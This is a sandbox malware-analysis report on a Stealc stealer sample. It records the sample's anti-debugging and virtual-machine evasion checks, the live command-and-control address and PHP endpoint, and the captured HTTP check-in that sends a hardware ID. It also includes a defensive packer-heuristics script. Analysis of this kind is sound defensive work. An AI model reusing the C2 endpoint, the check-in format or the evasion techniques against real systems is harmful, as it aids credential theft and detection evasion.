                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4F68A FindFirstFileA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A41160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware8
                Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2137808772.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2137808772.0000000001631000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13639
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13636
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13658
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13650
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13690
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A445C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A59860
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A59750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A578E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: Process Memory Space: file.exe PID: 5752, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A59600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A57B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A57980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A57850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A57A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2096593419.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5752, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2096593419.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5752, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques listed per tactic; leading numbers are the counts shown in the report's matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
s-part-0017.t-0009.t-msedge.net | 0% | Virustotal |
Source | Detection | Scanner | Label
http://185.215.113.206/ | 14% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/ | true | | unknown
http://185.215.113.206/e2b1563c6670f193.php | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1542671
                                      Start date and time:2024-10-26 05:54:08 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 3m 3s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:2
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 19
                                      • Number of non-executed functions: 91
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Stop behavior analysis, all processes terminated
                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      No simulations
Match: 185.215.113.206
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | LummaC, Stealc | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
zE8aZ90GHB.exe | malicious | Amadey | 185.215.113.206/k8FppT/index.php
0deHOGnvX6.exe | malicious | Amadey | 185.215.113.206/k8FppT/index.php
0deHOGnvX6.exe | malicious | Amadey | 185.215.113.206/k8FppT/index.php?scr=1

Match: s-part-0017.t-0009.t-msedge.net
Associated Sample Name / URL | Detection | Threat Name | Context
https://load.aberegg-immobilien.ch/ | malicious | HTMLPhisher | 13.107.246.45
file.exe | malicious | Stealc | 13.107.246.45
http://mychronictravel.eu.org/ | malicious | Unknown | 13.107.246.45
https://certify.us.com/D5QkoQ3Eniw4G2APQ3ED5QpQ3E4RAionz01coq01 | malicious | Unknown | 13.107.246.45
Rob.Kuster@stonhard.com.zip | malicious | HTMLPhisher, Mamba2FA | 13.107.246.45
zip file.zip | malicious | HTMLPhisher, Mamba2FA | 13.107.246.45
ACTION required to activate your account - bp Supplier Portal.eml | malicious | Unknown | 13.107.246.45
Match: WHOLESALECONNECTIONSNL
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC, Stealc | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Stealc, Vidar | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
                                      No context
                                      No context
                                      No created / dropped files found
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.947416099994073
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:1'834'496 bytes
                                      MD5:3833a1b7c23d66eecec6b16ddf5cf540
                                      SHA1:05182934e239a8e6715ada16e0ddcde3b7598e05
                                      SHA256:96f09e8bd3f67c287a0bb1529d5220d9496a233fba5b1608366a2c280a864dd2
                                      SHA512:3c824f5aa05ff6ba2a1f9d805d2d1f755f1a8a5646d367c325d0a7b6b38d0dfedd61e75f984fcc6686c27fd1a4c5147f874a9a468ef15aed589ed993d2033069
                                      SSDEEP:49152:8mRhmhK5ZSLue0v+HpxCBlwQhwegB589ooccs9GULcbHN1:JCKyvHpxC7BCLoULyt1
                                      TLSH:66853308BD684A6CC9AA8E7815AF8F8FE6651908DE3707932B3C2503353C27F9316D57
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0xa92000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x25b000 | 0x22800 | d3b01b827379ee525cfe171886a96f3a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x25e000 | 0x299000 | 0x200 | a1f9d605966ea6fc9df20e5f122a3960 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rhebxyzr | 0x4f7000 | 0x19a000 | 0x199c00 | f34a1321ebe2a7919025483fd801ab60 | False | 0.9951511497101891 | data | 7.953785461765037 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gzayextq | 0x691000 | 0x1000 | 0x400 | c58b1ce18291d655eb3a94c1e073947c | False | 0.78515625 | data | 6.105330411148558 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x692000 | 0x3000 | 0x2200 | 3190f6cc3b2153cc5b0de2090890dacc | False | 0.06135110294117647 | DOS executable (COM) | 0.7026692356155418 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports

DLL | Import
kernel32.dll | lstrcpy
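The section table and the one-entry import table above are the static side of the "Detected unpacking (changes PE section rights)" and "PE file contains section with special chars" signatures. The following is an added example, not part of the Joe Sandbox report or of the sample: a small packer-heuristic pass over the section table as printed on this page (the section records and entropies are transcribed by hand from the table, the indicator names and thresholds are my own choice), plus an RVA-to-section lookup that confirms the import and relocation directories land in .idata as the data-directory table states.

```python
"""Packer/obfuscation heuristics over a PE section table.

Sample data: the section table, data directories and import list printed
in this report, transcribed by hand (constructed input, not parsed from
the binary). Thresholds and indicator names are assumptions, not Joe
Sandbox's rules.
"""
from dataclasses import dataclass
from typing import List, Optional, Set

EXEC = "IMAGE_SCN_MEM_EXECUTE"
WRITE = "IMAGE_SCN_MEM_WRITE"
INIT = "IMAGE_SCN_CNT_INITIALIZED_DATA"
READ = "IMAGE_SCN_MEM_READ"
RWX = frozenset({INIT, EXEC, READ, WRITE})
RW = frozenset({INIT, READ, WRITE})

# Section names a linker normally emits; anything else is worth a look.
STANDARD = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
            ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".textbss"}


@dataclass
class Section:
    name: str
    vaddr: int
    vsize: int
    rawsize: int
    entropy: Optional[float]        # None where the report printed "unknown"
    chars: frozenset = frozenset()


# Rows of the "Sections" table on this page.
SECTIONS: List[Section] = [
    Section("",         0x1000,   0x25b000, 0x22800,  None,   RWX),
    Section(".rsrc",    0x25c000, 0x1000,   0x0,      0.0,    RW),
    Section(".idata",   0x25d000, 0x1000,   0x200,    0.9064, RW),
    Section("",         0x25e000, 0x299000, 0x200,    None,   RWX),
    Section("rhebxyzr", 0x4f7000, 0x19a000, 0x199c00, 7.9538, RWX),
    Section("gzayextq", 0x691000, 0x1000,   0x400,    6.1053, RWX),
    Section(".taggant", 0x692000, 0x3000,   0x2200,   0.7027, RWX),
]
IMPORTS = ["lstrcpy"]                 # the only import the report lists


def section_indicators(s: Section) -> List[str]:
    """Per-section indicators, in a fixed order so results are comparable."""
    hits: List[str] = []
    if {EXEC, WRITE} <= s.chars:
        hits.append("RWX")                       # self-modifying / unpack target
    if not s.name:
        hits.append("unnamed")
    elif s.name not in STANDARD:
        hits.append("non-standard name")
    if s.rawsize == 0 and s.vsize:
        hits.append("no raw data")               # exists only once mapped
    elif s.rawsize and s.vsize >= 4 * s.rawsize:
        hits.append("vsize>>rawsize")            # room for decompressed code
    if s.entropy is not None and s.entropy >= 7.0:
        hits.append("high entropy")              # compressed/encrypted payload
    return hits


def section_for_rva(sections: List[Section], rva: int) -> Optional[str]:
    """Name of the section whose virtual range contains rva, or None."""
    for s in sections:
        if s.vaddr <= rva < s.vaddr + s.vsize:
            return s.name or "<unnamed>"
    return None


def packer_indicators(sections: List[Section], imports: List[str]) -> Set[str]:
    """Distinct indicators across the whole image; empty set means clean."""
    flags: Set[str] = set()
    for s in sections:
        flags.update(section_indicators(s))
    if len(imports) <= 2:
        flags.add("tiny import table")           # real imports resolved at runtime
    if any(s.name == ".taggant" for s in sections):
        flags.add(".taggant present")            # section appended by taggant-aware packers
    return flags


if __name__ == "__main__":
    for s in SECTIONS:
        print(f"{s.name or '<unnamed>':>10} {section_indicators(s)}")
    print("import dir 0x25d050 ->", section_for_rva(SECTIONS, 0x25d050))
    print("reloc dir  0x25d1f8 ->", section_for_rva(SECTIONS, 0x25d1f8))
    print(sorted(packer_indicators(SECTIONS, IMPORTS)))
```

With a real file you would fill SECTIONS from the section headers instead of by hand; the logic is the same. Note that the two unnamed RWX sections have virtual sizes of 0x25b000 and 0x299000 backed by only 0x22800 and 0x200 bytes on disk, which is the pattern the "Dynamic/Decrypted Code" and "changes PE section rights" signatures later confirm at runtime.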
Suricata IDS alerts

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-26T05:55:08.006858+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
TCP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 26, 2024 05:55:06.800345898 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 26, 2024 05:55:06.805668116 CEST | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 26, 2024 05:55:06.805761099 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 26, 2024 05:55:06.813767910 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 26, 2024 05:55:06.819065094 CEST | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 26, 2024 05:55:07.717093945 CEST | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 26, 2024 05:55:07.717329025 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 26, 2024 05:55:07.720807076 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 26, 2024 05:55:07.726178885 CEST | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 26, 2024 05:55:08.006592989 CEST | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 26, 2024 05:55:08.006858110 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 26, 2024 05:55:11.563586950 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.206
DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 26, 2024 05:55:17.543045998 CEST | 1.1.1.1 | 192.168.2.5 | 0x705 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 26, 2024 05:55:17.543045998 CEST | 1.1.1.1 | 192.168.2.5 | 0x705 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
                                      • 185.215.113.206
HTTP sessions

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 5752 | C:\Users\user\Desktop\file.exe
HTTP data (Timestamp | Bytes transferred | Direction, followed by the data)

Oct 26, 2024 05:55:06.813767910 CEST | 90 | OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Oct 26, 2024 05:55:07.717093945 CEST | 203 | IN
HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 03:55:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 26, 2024 05:55:07.720807076 CEST | 412 | OUT
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE
Host: 185.215.113.206
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 35 43 35 37 43 45 37 41 38 39 35 31 34 37 30 31 38 32 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes; 210 bytes, matching Content-Length):
------GHDAAKJEGCFCAKEBKJJE
Content-Disposition: form-data; name="hwid"

4A5C57CE7A89514701825
------GHDAAKJEGCFCAKEBKJJE
Content-Disposition: form-data; name="build"

puma
------GHDAAKJEGCFCAKEBKJJE--

Oct 26, 2024 05:55:08.006592989 CEST | 210 | IN
HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 03:55:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64; decodes to "block")

The check-in carries only two form fields, the hardware ID and the build tag "puma", and the C2 answered with the base64 string for "block". No further HTTP requests appear in this capture, which is consistent with the low execution coverage reported below.
